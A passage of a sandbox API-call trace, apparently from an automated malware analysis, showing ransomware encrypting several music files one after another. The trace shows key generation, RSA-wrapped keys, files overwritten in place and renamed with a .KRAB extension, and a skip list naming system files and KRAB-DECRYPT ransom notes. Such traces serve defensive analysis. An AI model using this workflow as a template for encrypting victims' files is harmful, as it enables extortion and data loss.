(lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\m7c7gt62.m4a") returned 67 [0094.270] lstrcmpiW (lpString1="m7c7gt62.m4a", lpString2="desktop.ini") returned 1 [0094.270] lstrcmpiW (lpString1="m7c7gt62.m4a", lpString2="autorun.inf") returned 1 [0094.270] lstrcmpiW (lpString1="m7c7gt62.m4a", lpString2="ntuser.dat") returned -1 [0094.270] lstrcmpiW (lpString1="m7c7gt62.m4a", lpString2="iconcache.db") returned 1 [0094.270] lstrcmpiW (lpString1="m7c7gt62.m4a", lpString2="bootsect.bak") returned 1 [0094.271] lstrcmpiW (lpString1="m7c7gt62.m4a", lpString2="boot.ini") returned 1 [0094.271] lstrcmpiW (lpString1="m7c7gt62.m4a", lpString2="ntuser.dat.log") returned -1 [0094.271] lstrcmpiW (lpString1="m7c7gt62.m4a", lpString2="thumbs.db") returned -1 [0094.271] lstrcmpiW (lpString1="m7c7gt62.m4a", lpString2="KRAB-DECRYPT.html") returned 1 [0094.271] lstrcmpiW (lpString1="m7c7gt62.m4a", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.271] lstrcmpiW (lpString1="m7c7gt62.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.271] lstrcmpiW (lpString1="m7c7gt62.m4a", lpString2="ntldr") returned -1 [0094.271] lstrcmpiW (lpString1="m7c7gt62.m4a", lpString2="NTDETECT.COM") returned -1 [0094.271] lstrcmpiW (lpString1="m7c7gt62.m4a", lpString2="Bootfont.bin") returned 1 [0094.271] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.271] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010e80) returned 1 [0094.272] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.272] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.272] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.273] CryptGenRandom (in: hProv=0x1010e80, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0094.273] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0094.273] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.273] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010df8) returned 1 [0094.273] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.274] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.274] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.274] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0094.274] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.274] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.275] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0094.275] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdfe0) returned 1 [0094.275] CryptGetKeyParam (in: hKey=0xfbdfe0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.275] CryptEncrypt (in: hKey=0xfbdfe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.276] GetLastError () returned 0x0 [0094.276] CryptDestroyKey (hKey=0xfbdfe0) returned 1 [0094.276] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.276] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011898) returned 1 [0094.276] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdae0) returned 1 [0094.276] CryptGetKeyParam (in: hKey=0xfbdae0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.276] CryptEncrypt (in: hKey=0xfbdae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.277] GetLastError () returned 0x0 [0094.277] CryptDestroyKey (hKey=0xfbdae0) returned 1 [0094.277] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0094.277] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\m7c7gt62.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\m7c7gt62.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0094.278] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.278] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.279] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x5ee9, lpOverlapped=0x0) returned 1 [0094.303] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffa117, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.303] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x5ee9, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x5ee9, lpOverlapped=0x0) returned 1 [0094.303] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0094.303] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.308] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.309] CloseHandle (hObject=0x43c) returned 1 [0094.309] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.309] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\m7c7gt62.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\m7c7gt62.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\m7c7gt62.m4a.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\m7c7gt62.m4a.krab")) returned 1 [0094.310] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.311] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.311] lstrcmpW (lpString1="NUqk-.wav", lpString2=".") returned 1 [0094.311] lstrcmpW (lpString1="NUqk-.wav", lpString2="..") returned 1 [0094.311] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\", lpString2="NUqk-.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\NUqk-.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\NUqk-.wav" [0094.311] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.311] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\NUqk-.wav.KRAB") returned 69 [0094.311] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\NUqk-.wav") returned 64 [0094.311] lstrlenW (lpString=".wav") returned 4 [0094.311] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.312] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".wav ") returned 5 [0094.312] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.312] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\NUqk-.wav") returned 64 [0094.312] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\NUqk-.wav") returned 64 [0094.312] lstrcmpiW (lpString1="NUqk-.wav", lpString2="desktop.ini") returned 1 [0094.312] lstrcmpiW (lpString1="NUqk-.wav", lpString2="autorun.inf") returned 1 [0094.312] lstrcmpiW (lpString1="NUqk-.wav", lpString2="ntuser.dat") returned 1 [0094.312] lstrcmpiW (lpString1="NUqk-.wav", lpString2="iconcache.db") returned 1 [0094.312] lstrcmpiW (lpString1="NUqk-.wav", lpString2="bootsect.bak") returned 1 [0094.312] lstrcmpiW (lpString1="NUqk-.wav", lpString2="boot.ini") returned 1 [0094.312] lstrcmpiW (lpString1="NUqk-.wav", lpString2="ntuser.dat.log") returned 1 [0094.312] lstrcmpiW (lpString1="NUqk-.wav", lpString2="thumbs.db") returned -1 [0094.312] lstrcmpiW (lpString1="NUqk-.wav", lpString2="KRAB-DECRYPT.html") returned 1 [0094.312] lstrcmpiW (lpString1="NUqk-.wav", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.312] lstrcmpiW (lpString1="NUqk-.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.312] lstrcmpiW (lpString1="NUqk-.wav", lpString2="ntldr") returned 1 [0094.312] lstrcmpiW (lpString1="NUqk-.wav", lpString2="NTDETECT.COM") returned 1 [0094.313] lstrcmpiW (lpString1="NUqk-.wav", lpString2="Bootfont.bin") returned 1 [0094.313] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.313] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010df8) returned 1 [0094.313] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.314] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.314] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.314] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0094.314] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.314] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.314] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010df8) returned 1 [0094.315] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.315] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.316] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.316] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0094.316] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.316] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.316] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0094.316] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdfe0) returned 1 [0094.317] CryptGetKeyParam (in: hKey=0xfbdfe0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.317] CryptEncrypt (in: hKey=0xfbdfe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.317] GetLastError () returned 0x0 [0094.317] CryptDestroyKey (hKey=0xfbdfe0) returned 1 [0094.317] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.317] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0094.318] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdfe0) returned 1 [0094.318] CryptGetKeyParam (in: hKey=0xfbdfe0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.318] CryptEncrypt (in: hKey=0xfbdfe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.318] GetLastError () returned 0x0 [0094.318] CryptDestroyKey (hKey=0xfbdfe0) returned 1 [0094.318] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.318] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\NUqk-.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\nuqk-.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0094.319] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.320] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.321] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x17369, lpOverlapped=0x0) returned 1 [0094.344] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffe8c97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.344] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x17369, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x17369, lpOverlapped=0x0) returned 1 [0094.345] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0094.345] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.359] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.363] CloseHandle (hObject=0x43c) returned 1 [0094.363] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.367] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\NUqk-.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\nuqk-.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\NUqk-.wav.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\nuqk-.wav.krab")) returned 1 [0094.368] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.369] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.369] lstrcmpW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2=".") returned 1 [0094.369] lstrcmpW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2="..") returned 1 [0094.369] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\", lpString2="smaZj9308SZR_gdteWA.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\smaZj9308SZR_gdteWA.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\smaZj9308SZR_gdteWA.wav" [0094.369] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.369] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\smaZj9308SZR_gdteWA.wav.KRAB") returned 83 [0094.369] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\smaZj9308SZR_gdteWA.wav") returned 78 [0094.373] lstrlenW (lpString=".wav") returned 4 [0094.373] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.376] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".wav ") returned 5 [0094.376] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.377] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\smaZj9308SZR_gdteWA.wav") returned 78 [0094.377] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\smaZj9308SZR_gdteWA.wav") returned 78 [0094.377] lstrcmpiW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2="desktop.ini") returned 1 [0094.377] lstrcmpiW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2="autorun.inf") returned 1 [0094.377] lstrcmpiW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2="ntuser.dat") returned 1 [0094.377] lstrcmpiW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2="iconcache.db") returned 1 [0094.377] lstrcmpiW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2="bootsect.bak") returned 1 [0094.377] lstrcmpiW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2="boot.ini") returned 1 [0094.377] lstrcmpiW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2="ntuser.dat.log") returned 1 [0094.377] lstrcmpiW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2="thumbs.db") returned -1 [0094.377] lstrcmpiW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2="KRAB-DECRYPT.html") returned 1 [0094.377] lstrcmpiW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.377] lstrcmpiW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.377] lstrcmpiW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2="ntldr") returned 1 [0094.377] lstrcmpiW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2="NTDETECT.COM") returned 1 [0094.377] lstrcmpiW (lpString1="smaZj9308SZR_gdteWA.wav", lpString2="Bootfont.bin") returned 1 [0094.378] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.380] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10110a0) returned 1 [0094.381] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.385] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.385] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.385] CryptGenRandom (in: hProv=0x10110a0, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0094.385] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0094.385] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.385] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10113d0) returned 1 [0094.386] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.386] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.387] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.387] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0094.387] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0094.387] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.387] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0094.388] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbe0a0) returned 1 [0094.388] CryptGetKeyParam (in: hKey=0xfbe0a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.388] CryptEncrypt (in: hKey=0xfbe0a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.388] GetLastError () returned 0x0 [0094.388] CryptDestroyKey (hKey=0xfbe0a0) returned 1 [0094.388] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.388] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10112c0) returned 1 [0094.389] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdfe0) returned 1 [0094.389] CryptGetKeyParam (in: hKey=0xfbdfe0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.389] CryptEncrypt (in: hKey=0xfbdfe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.389] GetLastError () returned 0x0 [0094.389] CryptDestroyKey (hKey=0xfbdfe0) returned 1 [0094.389] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0094.389] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\smaZj9308SZR_gdteWA.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\smazj9308szr_gdtewa.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0094.390] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.391] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.391] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x3526, lpOverlapped=0x0) returned 1 [0094.410] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffcada, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.411] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x3526, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x3526, lpOverlapped=0x0) returned 1 [0094.411] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0094.411] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.416] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.417] CloseHandle (hObject=0x43c) returned 1 [0094.417] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.417] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\smaZj9308SZR_gdteWA.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\smazj9308szr_gdtewa.wav"), 